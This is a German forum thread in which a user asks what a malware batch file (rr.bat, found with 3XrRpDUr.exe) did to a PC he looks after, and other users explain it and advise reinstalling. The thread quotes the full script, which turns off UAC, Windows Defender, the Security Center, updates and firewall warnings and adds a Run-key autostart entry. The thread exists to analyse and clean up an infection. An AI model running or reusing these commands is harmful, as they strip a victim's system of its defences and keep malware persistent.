Was ist das für ein Virus und was macht er? 3XrRpDUr.exe

[JamesFunk]

Hi,

ich habe gerade einen Anruf von jemandem bekommen, den ich beim Umgang mit seinem PC betreue.
Bei seinem Computer ging das Internet nicht mehr.
Ich habe erst gedacht, dass das keine große Sache ist, es hat sich aber rausgestellt, das da Schadsoftware am Werk ist.

Grundsätzlich ist das kein Problem. Ich habe immer gepredigt, die privaten Daten auf einer Festplatte D zu speichern, das System liegt auf C. Das sind keien Partitionen, sondern zwei physikalische Festplatten.
Datensicherungen (Festplattenclones) habe ich bei meinen Besuchen regelmäßig gemacht.

Das Ding ist jetzt nur, dass ich recht viel zu tun habe und es der Senior nicht schaffen wird, die Sicherung wieder einzuspielen bzw. die Festplatte C zu tauschen. Ich möchte das auch nicht, weil ich dann (im erneuten Schadensfall) keine einwandfreie Sicherung mehr habe.

Der PC muss also irgendwie zum Laufen gebracht werden. Ich habe es übers Telefon schnell geschafft, dass er en PC in den "abgesicherten Modus mit Netzwerktreibern" bootet. Dann wurde Teamviewer gestartet, ich habe jetzt Zugriff.

Über die msconfig ist mir direkt aufgefallen, dass da ein verdächtiges Element ist:

Systemstartelement: AS2014
Hersteller: Unbekannt
Befehl: C:\ProgramData\3XrRpDUr\3XrRpDUr.exe
Ort: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

In dem Ordner C:\ProgramData\3XrRpDUr sind diese Datein:

3XrRpDUr.exe
3XrRpDUr.exe.manifest
3XrRpDUr.ico
3XrRpDUrgaDXsaSD.in
3XrRpDUrgaDXsaSD.lg
1934904736011915655.exe
1934905690243886256.exe
DD1
DD2
DD3
rr.bat

Der Inhalt der rr.bat ist:

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f


sC StOp wscsvc

ping localhost -w 1000 -n 3 > nul


sc config windefend start= disabled

sc config msmpsvc start= disabled

sc.exe config wuauserv start= disabled

sC  config  wscsvc start= disabled

sc.exe config luafv start= disabled



reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f


reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v AntiVirusDisableNotify /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 1 /f


reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f


reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v FirewallDisableNotify /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 1 /f


reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v FirewallOverride /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 1 /f


reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v UpdatesDisableNotify /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 1 /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP\Clients" /va /f
sC   StOp    WinDefend
sC StOp msmpsvc
sC StOp wuauserv
reG adD   "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v AntiVirusOverride /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AS2014 /t REG_SZ /d "C:\ProgramData\3XrRpDUr\3XrRpDUr.exe" /f

Aktuell läut Malwarebytes-Anti-Malware.
Die infizierten Dateien werde ich natürlich löschen. Genauso wie den Ordner C:\ProgramData\3XrRpDUr (inkl. Inhalt).


Mich interessiert jetzt noch, was durch diese Batch Datei gemacht wurde, was potentiell rückgängig gemacht werden sollte.

Die Dateien aus dem Ordner C:\ProgramData\3XrRpDUr sind alle von heute nachmittag.
Onlinebanking oder andere Sachen, bei denen großer Schaden zu befürchten ist, wird nicht verwendet. Auch kein ebay/amazon.

Es geht jetzt einzig darum, den PC wieder lauffähig zu bekommen, bis ich in zwei Wochen wieder da bin und die infizierte mit der gesicherten Festplatte austauschen kann. Danach werde ich die infizierte formatieren und ein neues Backup erstellen.

Es wäre super, wenn mir jemand erklären kann, was die .bat Datei alles macht/gemacht hat.

Danke und Gruß,
James

 

[chrigu]

steht ja dort: windows nackt machen um ungehindert zu laufen, inklusive alle updates abstellen um unerkannt zu bleiben.

wobei deine frage sollte lauten: "wie krieg ich das ding ganz weg"... nicht "was macht es"

 

[Arcturus]

Puhhh, das startet etwas in einer virtuellen Machine wies aussieht und schaltet so ziemlich alle Windows-Sicherheitsoptioenn ab.
Dann scheint irgendwas nachgeladen zu werden.
Das System würd ich komplett neu machen, einschliesslich Neupartartitionierung und Formatierung von C:

 

[Trefoil80]

Ist doch auch für Nicht-ITler schnell zu erkennen:

- Warnungen für das Deaktivieren der Firewall und des Virenscanners deaktivieren
- Firewall und Virenscanner umgehen
- Komische Dateien (Trojaner) ausführen/nachladen
- Etc. etc.

Würde nicht lange am Rechner rumfrickeln, sondern neu aufsetzen (wie immer, wenn Schadsoftware im Spiel ist)!

 

[JamesFunk]

Weg bekomme ich das schon.
Ich baue in zwei Wochen die Festplatte C aus und die geclonte Festplatte ein. Damit habe ich den Stand von Anfang Dezember und das Ding ist garantiert weg.

Was passiert denn jetzt, wenn ich den Ordner lösche und neu hochfahre?
Sind dann auch alle Updates weg und Windows "nackt"?

Ist da ggf noch etwas in der Registry verstellt?


Jungs das Neuaufsetzen mache ich in zwei Wochen wenn ich da bin (Cloen einspielen)!
Bis dahin soll es laufen.
Jetzt kann ich es nicht. Der PC steht über 100km weit weg.

 

[Jyskall]

Könnte der Trojaner gewesen sein der sich als "Windows Defender" ausgibt. Arbeit mit PopUps die fast gleich aussehe und ein unbedarfter Benutzer klickt dann doch schnell mal auf Installieren.

Das Script ändert wie schon vom vorherigen Poster gesagt, die Update Suche und den Start der Anti-Virensoftware.


Edit:

Wenn der Virus nicht nur als "Datei" auf dem Rechner liegt, sondern bereits 1 mal ausgeführt wurde könnte jede Ausführbare Datei kompromittiert sein. Der Virus/Trojaner könnte sich also selbst wiederherstellen und in Backups "einschleusen". In dem Fall hilft nur eine Neuinstallation oder ein Full-Backup.

 

[Arcturus]

In der Registry ist da einiges verstellt.
"reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f"
ist auch unschön. Wenn irgendwas in einer virtuellen Umgebung beim Windows Start geladen wird, nutzt dir eine normale Bereinigung nichts.
Dann hilft wirklich nur Platte platt machen.

 

[RagingBlast]

Puhhh, das startet etwas in einer virtuellen Machine[...]

Bitte was?

On-Topic:
Wenn du wirklich aus Neugier wissen willst, was das macht:
-Bei Virustotal hochladen und nach den Ergebnissen googlen
-Eine VM aufsetzen, darin ausführen und den ganzen Ablauf mit Filemon (heißt jetzt wohl ProcessMonitor) loggen
-Mit IDA den (Quell-)Code angucken

 

[sdwaroc]

Hallo,

In Zeile 1-5 werden Registry-Einträge hinzugefügt. Einfach dem Pfad folgen und die Änderungen rückgängig machen.

In Zeile 8 wird das Windows Security Center deaktiviert.

In Zeile 10 wird der localhost angepingt.

In Zeile 13 - 21 werden verschiedene Sicherheitsdienste deaktiviert.

In 25 und 27 werden Registry einträge gelöscht.

In 30 - 51 werden dann verschiedene Registry-Einträge verändert, hinzugefügt oder gelöscht.

52 - 54: hier werden Dienste beendet.

55 - 56: Veränderung von Registry einträgen.

- so, so ähnlich, oder ganz anders ;-)

 

[JamesFunk]

Ändert das Script diese Sachen denn für immer oder sind die Änderungen weg, wenn man Windows neustartet und die .exe nicht mehr ausgeführt wird?

Sollte/kann man die Registry Sachen rückgängig machen? Z.B. die Werte von meiner Registry da eintragen?

 

[chrigu]

dieses system kannst du nicht mit einem tool reinigen, da sind zu viele grundlegende sachen manipuliert worden..

da hilft nur format c: und neuinstallieren.

ps: die registry-änderungen kannst du nicht rückgängig machen, ausser du hast ein backup davon

 

[JamesFunk]

Super, danke!

Wie bekomme ich die gelöschten Einträge (Zeile 25, 27 und 30 - 51) wieder?

Hallo,

In Zeile 1-5 werden Registry-Einträge hinzugefügt. Einfach dem Pfad folgen und die Änderungen rückgängig machen.

In Zeile 8 wird das Windows Security Center deaktiviert.

In Zeile 10 wird der localhost angepingt.

In Zeile 13 - 21 werden verschiedene Sicherheitsdienste deaktiviert.

In 25 und 27 werden Registry einträge gelöscht.

In 30 - 51 werden dann verschiedene Registry-Einträge verändert, hinzugefügt oder gelöscht.

52 - 54: hier werden Dienste beendet.

55 - 56: Veränderung von Registry einträgen.

 

[RagingBlast]

Super, danke!

Wie bekomme ich die gelöschten Einträge (Zeile 25, 27 und 30 - 51) wieder?

Nix wiederbekommen, Format C...

 

[JamesFunk]

dieses system kannst du nicht mit einem tool reinigen, da sind zu viele grundlegende sachen manipuliert worden..

da hilft nur format c: und neuinstallieren.

Lest doch bitte mal den kompletten Startpost.
Heute/in den nächsten zwei Wochen geht das nicht, weil ich nicht vor Ort bin.

Neuinstallieren ist Quatsch, weil die Festplatte geclont im Regal liegt. Ich muss sie nur tauschen, dann ist alles gut. Aber das kann ich erst in 2 Wochen machen.

 

[RagingBlast]

[...]Neuinstallieren ist Quatsch, weil die Festplatte geclont im Regal liegt. Ich muss sie nur tauschen, dann ist alles gut. Aber das kann ich erst in 2 Wochen machen.

Dann ist die Sache doch erledigt.
Wenn die Kiste noch zum Surfen genutzt werden soll, dann mit einem Linux von einer LiveDVD.

Den Rechner weiter zu benutzen bzw. daran rumzudoktorn halte ich für mehr als unverantwortlich, vor allem weil es nicht deiner ist.

 

[max_1234]

Weg bekomme ich das schon.

Hast du das Teil geschrieben und weißt du was genau es macht? Nein.
Also Nein.

Ich baue in zwei Wochen die Festplatte C aus und die geclonte Festplatte ein. Damit habe ich den Stand von Anfang Dezember und das Ding ist garantiert weg.

Und wenn das Teil sich inkognito auf die zweite Platte sichert?
Also Nein.

Was passiert denn jetzt, wenn ich den Ordner lösche und neu hochfahre?

Moment, meine Glaskugel steht grad neben mir ....
Spaß beiseite, die Ordner werden neu nachgeladen/erstellt.

Sind dann auch alle Updates weg und Windows "nackt"?

Wirst du dafür eigtl. bezahlt?

Ist da ggf noch etwas in der Registry verstellt?

Ich hoffe inständig dass du beruflich nicht in der Branche aktiv ist.

Jungs das Neuaufsetzen mache ich in zwei Wochen wenn ich da bin (Cloen einspielen)!

Eine geklonte Partition zu kopieren ist KEIN neu Aufsetzen. "!="

Bis dahin soll es laufen.

Ohne Opfer wären Botnetze nur leer ...

mfg,
Max

 

[sdwaroc]

Er kann gerade nicht neu machen. Lest bitte ganz oder lasst das antworten sein. Das System wird nicht für kritische Anwendungen genutzt, er muss nur internetfähig laufen bis er in 2 Wochen wieder ganz der alte ist - ist doch nicht so schwer zu verstehen.

@ TE
Wie du die wiederherstellst kann ich dir nicht genau sagen, ich weiß ja nicht was drin stand.

Hier ein paar Link:
MSASCui

Ob die Doktorei an dem System zum Erfolg wird kann ich dir nicht garantieren ;-). Give it a try!

@max_1234
Benimm dich bitte! Es ist jedem selbst überlassen wie er mit Systemen umgeht und liegt außerhalb jeder Fremdbewertung.

 

[Bartmensch]

Wenn der Rechner VOR dem Virenbefall geclont wurde, kannst Du das durchaus so machen.
Ansonsten würde ich nochmal ein Boot mit diversen Anti-Virus Start CDs versuchen, wäre mal neugierig, wie der Schädling wirklich heißt und ob er erkannt wird. Beispielsweise kannst Du das hier runterladen: http://www.avira.com/de/download?product=avira-rescue-system

 

[areiland]

Wenn Du die Festplatte geclont im Schrank liegen hast - was läge denn da näher als sie an Deinen Rechner zu hängen, Dich mit ihrer Registry zu verbinden und die betroffenen Schlüssel zu exportieren, um sie auf dem betroffenen System zu importieren? Natürlich erst nachdem Du den Rechner sicher von allen Komponenten dieses Schädlings befreit hast?

Ausserdem kannst Du ja die eingefügten Registry Schlüssel auch direkt aus der Registry des betroffenen Rechners löschen. Du hast ja schliesslich Zugriff auf den Rechner.

 

[RagingBlast]

Er kann gerade nicht neu machen. Lest bitte ganz oder lasst das antworten sein. Das System wird nicht für kritische Anwendungen genutzt, er muss nur internetfähig laufen bis er in 2 Wochen wieder ganz der alte ist - ist doch nicht so schwer zu verstehen.[...]

Definiere kritisch? Mails checken? Dann ist der Account weg...